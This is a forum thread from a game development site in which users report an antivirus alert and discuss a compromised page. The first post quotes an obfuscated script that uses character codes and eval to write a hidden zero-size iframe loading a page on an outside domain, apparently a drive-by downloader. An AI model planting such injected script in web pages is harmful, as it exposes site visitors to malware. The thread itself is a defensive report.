Jump to content
  • Advertisement
Sign in to follow this  
Endurion

HTML Script Virus Warning

This topic is 4468 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.

If you intended to correct an error in the post then please contact us.

Recommended Posts

I'm getting a HTML Script Virus warning from my scanner (Avira AntiVir Guard) on GameDev. It's coming from http://www.kingbaba.cc/ma/news.htm, the script virus is named "HTML/Dldr.Agen.DA.1". Could you check into that one? I didn't get that warning two hours ago. Is my scanner crap or is there actually a script virus? Edit: There's this weird script part in the page source: <script> t="60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,107,105,110,103,98,97,98,97,46,99,99,47,109,97,47,105,110,100,101,120,46,104,116,109,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62" t=eval("String.fromCharCode("+t+")"); document.write(t);</script>

Share this post


Link to post
Share on other sites
Advertisement


If you look at the left hand edge of your browser window, under the title, you'll see an IFRAME that links to this url.

Share this post


Link to post
Share on other sites
I can see it too, how the hell does it install itself? Is it attached to the html code of gamedev.net? Are the servers compromised?

Or is it client-side?

Share this post


Link to post
Share on other sites
I'm getting a request to run "Microsoft vector graphics rendering (VML)", and my back button isn't working properly either.

This is nuts.

Share this post


Link to post
Share on other sites
I'm constantly getting this off and on. It'll get fixed for a while, but seems to eventually reassert itself. Maybe Jack Johnson is targetting the site as a way of stopping video game developers before they even have a chance to make the games that he so vehemently (sp?) opposes. :D

Share this post


Link to post
Share on other sites
I see it too, the tiny square and code. Very strange.

EDIT:
It does not appear in IE7. It will instead cause the browser to yell at you, asking you if it is okay to run an active x control.

Share this post


Link to post
Share on other sites
I see it too if you drop down on the back button you see a entry for "www.kingbaba.cc" that can't be good. Anybody know what it is trying to install? Has anyone emailed gamedev and asked wtf? I've redirected kingbaba.cc to 127.0.0.1 in my hosts file so hopefully that will over some protection as symatic corp isn't flagging anything.

Share this post


Link to post
Share on other sites
Sign in to follow this  

  • Advertisement
×

Important Information

By using GameDev.net, you agree to our community Guidelines, Terms of Use, and Privacy Policy.

GameDev.net is your game development community. Create an account for your GameDev Portfolio and participate in the largest developer community in the games industry.

Sign me up!